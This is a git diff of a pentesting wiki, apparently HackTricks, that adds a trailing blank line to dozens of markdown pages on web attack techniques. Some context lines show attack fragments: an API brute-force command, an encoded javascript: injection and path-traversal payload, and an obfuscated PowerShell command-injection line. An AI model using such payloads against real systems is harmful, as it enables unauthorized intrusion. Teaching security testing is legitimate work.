+++ b/src/network-services-pentesting/pentesting-web/special-http-headers.md
@@ -202,3 +202,4 @@ Strict-Transport-Security: max-age=3153600 {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/spring-actuators.md b/src/network-services-pentesting/pentesting-web/spring-actuators.md
index 38c2a8798..8d1fdd8c2 100644
--- a/src/network-services-pentesting/pentesting-web/spring-actuators.md
+++ b/src/network-services-pentesting/pentesting-web/spring-actuators.md
@@ -66,3 +66,4 @@
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-web/symphony.md b/src/network-services-pentesting/pentesting-web/symphony.md
index 81f72d555..0debebc08 100644
--- a/src/network-services-pentesting/pentesting-web/symphony.md
+++ b/src/network-services-pentesting/pentesting-web/symphony.md
@@ -11,3 +11,4 @@ Take a look to the following posts:
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-web/tomcat/README.md b/src/network-services-pentesting/pentesting-web/tomcat/README.md
index d50fdce6e..1259ddfea 100644
--- a/src/network-services-pentesting/pentesting-web/tomcat/README.md
+++ b/src/network-services-pentesting/pentesting-web/tomcat/README.md
@@ -266,3 +266,4 @@ Example:
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-web/uncovering-cloudflare.md b/src/network-services-pentesting/pentesting-web/uncovering-cloudflare.md
index 7d1157b65..996f5d6d8 100644
--- a/src/network-services-pentesting/pentesting-web/uncovering-cloudflare.md
+++ b/src/network-services-pentesting/pentesting-web/uncovering-cloudflare.md
@@ -143,3 +143,4 @@ Find more info about how to do this in the [original article](https://scrapeops.
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-web/vmware-esx-vcenter....md b/src/network-services-pentesting/pentesting-web/vmware-esx-vcenter....md
index ce0b6a875..2cbf52384 100644
--- a/src/network-services-pentesting/pentesting-web/vmware-esx-vcenter....md
+++ b/src/network-services-pentesting/pentesting-web/vmware-esx-vcenter....md
@@ -21,3 +21,4 @@ If you find valid credentials, you can use more metasploit scanner modules to ob
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-web/web-api-pentesting.md b/src/network-services-pentesting/pentesting-web/web-api-pentesting.md
index 8a2948b7a..7f613e839 100644
--- a/src/network-services-pentesting/pentesting-web/web-api-pentesting.md
+++ b/src/network-services-pentesting/pentesting-web/web-api-pentesting.md
@@ -57,3 +57,4 @@ kr brute https://domain.com/api/ -w /tmp/lang-english.txt -x 20 -d=0
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-web/werkzeug.md b/src/network-services-pentesting/pentesting-web/werkzeug.md
index e1a3d8605..d4e3d0800 100644
--- a/src/network-services-pentesting/pentesting-web/werkzeug.md
+++ b/src/network-services-pentesting/pentesting-web/werkzeug.md
@@ -175,3 +175,4 @@ This is because, In Werkzeug it's possible to send some **Unicode** characters a
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/pentesting-web/wordpress.md b/src/network-services-pentesting/pentesting-web/wordpress.md
index 0260ce95a..180de8d19 100644
--- a/src/network-services-pentesting/pentesting-web/wordpress.md
+++ b/src/network-services-pentesting/pentesting-web/wordpress.md
@@ -437,3 +437,4 @@ Also, **only install trustable WordPress plugins and themes**.
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/2fa-bypass.md b/src/pentesting-web/2fa-bypass.md
index 24bd00412..a00bcde8d 100644
--- a/src/pentesting-web/2fa-bypass.md
+++ b/src/pentesting-web/2fa-bypass.md
@@ -131,3 +131,4 @@ P
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/abusing-hop-by-hop-headers.md b/src/pentesting-web/abusing-hop-by-hop-headers.md
index a2df520bf..cae0fce90 100644
--- a/src/pentesting-web/abusing-hop-by-hop-headers.md
+++ b/src/pentesting-web/abusing-hop-by-hop-headers.md
@@ -42,3 +42,4 @@ If a cache server incorrectly caches content based on hop-by-hop headers, an att
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/account-takeover.md b/src/pentesting-web/account-takeover.md
index 521e3b649..fe48525c6 100644
--- a/src/pentesting-web/account-takeover.md
+++ b/src/pentesting-web/account-takeover.md
@@ -124,3 +124,4 @@ With the new login, although different cookies might be generated the old ones b
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/bypass-payment-process.md b/src/pentesting-web/bypass-payment-process.md
index 0825cccf8..024105736 100644
--- a/src/pentesting-web/bypass-payment-process.md
+++ b/src/pentesting-web/bypass-payment-process.md
@@ -41,3 +41,4 @@ If you encounter a parameter that contains a URL, especially one following the p
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/captcha-bypass.md b/src/pentesting-web/captcha-bypass.md
index 6026d0e83..d8b38e4b4 100644
--- a/src/pentesting-web/captcha-bypass.md
+++ b/src/pentesting-web/captcha-bypass.md
@@ -37,3 +37,4 @@ To **bypass** the captcha during **server testing** and automate user input func
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/clickjacking.md b/src/pentesting-web/clickjacking.md
index 06f5df8d3..aadcd1184 100644
--- a/src/pentesting-web/clickjacking.md
+++ b/src/pentesting-web/clickjacking.md
@@ -204,3 +204,4 @@ if (top !== self) {
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/client-side-path-traversal.md b/src/pentesting-web/client-side-path-traversal.md
index 2c6b3991d..55b1c475e 100644
--- a/src/pentesting-web/client-side-path-traversal.md
+++ b/src/pentesting-web/client-side-path-traversal.md
@@ -16,3 +16,4 @@ A client side path traversal occurs when you can **manipulate the path of a URL*
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/client-side-template-injection-csti.md b/src/pentesting-web/client-side-template-injection-csti.md
index 76b48187c..b127c789b 100644
--- a/src/pentesting-web/client-side-template-injection-csti.md
+++ b/src/pentesting-web/client-side-template-injection-csti.md
@@ -89,3 +89,4 @@ javascript:alert(1)%252f%252f..%252fcss-images
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/command-injection.md b/src/pentesting-web/command-injection.md
index d05b312e4..4e6472199 100644
--- a/src/pentesting-web/command-injection.md
+++ b/src/pentesting-web/command-injection.md
@@ -143,3 +143,4 @@ powershell C:**2\n??e*d.*? # notepad
+
diff --git a/src/pentesting-web/cors-bypass.md b/src/pentesting-web/cors-bypass.md
index db36b5f2f..d1e56ca3b 100644
--- a/src/pentesting-web/cors-bypass.md
+++ b/src/pentesting-web/cors-bypass.md
@@ -445,3 +445,4 @@ You can find more information about the previous bypass techniques and how to us
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/crlf-0d-0a.md b/src/pentesting-web/crlf-0d-0a.md
index 802317a1c..5d697aed3 100644
--- a/src/pentesting-web/crlf-0d-0a.md
+++ b/src/pentesting-web/crlf-0d-0a.md
@@ -222,3 +222,4 @@ To mitigate the risks of CRLF (Carriage Return and Line Feed) or HTTP Header Inj
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/csrf-cross-site-request-forgery.md b/src/pentesting-web/csrf-cross-site-request-forgery.md
index 389f0f2d0..c03b56215 100644
--- a/src/pentesting-web/csrf-cross-site-request-forgery.md
+++ b/src/pentesting-web/csrf-cross-site-request-forgery.md
@@ -689,3 +689,4 @@ with open(PASS_LIST, "r") as f:
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/dependency-confusion.md b/src/pentesting-web/dependency-confusion.md
index 8ca02f3cc..a2287183f 100644
--- a/src/pentesting-web/dependency-confusion.md
+++ b/src/pentesting-web/dependency-confusion.md
@@ -45,3 +45,4 @@ In the [**original post about dependency confusion**](https://medium.com/@alex.b
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/domain-subdomain-takeover.md b/src/pentesting-web/domain-subdomain-takeover.md
index 563f28335..b4bca5b9d 100644
--- a/src/pentesting-web/domain-subdomain-takeover.md
+++ b/src/pentesting-web/domain-subdomain-takeover.md
@@ -81,3 +81,4 @@ For cloud providers, verifying domain ownership is crucial to prevent subdomain
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/email-injections.md b/src/pentesting-web/email-injections.md
index 6a8b254c2..e75f93b88 100644
--- a/src/pentesting-web/email-injections.md
+++ b/src/pentesting-web/email-injections.md
@@ -205,3 +205,4 @@ For more detailed information, AWS's official documentation on handling bounces
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/formula-csv-doc-latex-ghostscript-injection.md b/src/pentesting-web/formula-csv-doc-latex-ghostscript-injection.md
index 90fa7a652..1c21829db 100644
--- a/src/pentesting-web/formula-csv-doc-latex-ghostscript-injection.md
+++ b/src/pentesting-web/formula-csv-doc-latex-ghostscript-injection.md
@@ -199,3 +199,4 @@ From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130)
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/grpc-web-pentest.md b/src/pentesting-web/grpc-web-pentest.md
index 1b1b49aec..3ea9c8e67 100644
--- a/src/pentesting-web/grpc-web-pentest.md
+++ b/src/pentesting-web/grpc-web-pentest.md
@@ -152,3 +152,4 @@ grpc.gateway.testing.ClientStreamingEchoResponse:
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/h2c-smuggling.md b/src/pentesting-web/h2c-smuggling.md
index 8af5e2efc..5f2a27a26 100644
--- a/src/pentesting-web/h2c-smuggling.md
+++ b/src/pentesting-web/h2c-smuggling.md
@@ -94,3 +94,4 @@ Check the labs to test both scenarios in [https://github.com/0ang3el/websocket-s
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/http-connection-contamination.md b/src/pentesting-web/http-connection-contamination.md
index 03814abd0..3858047f1 100644
--- a/src/pentesting-web/http-connection-contamination.md
+++ b/src/pentesting-web/http-connection-contamination.md
@@ -25,3 +25,4 @@ Best practices include avoiding first-request routing in reverse proxies and bei
 {{#include ../banners/hacktricks-training.md}}
+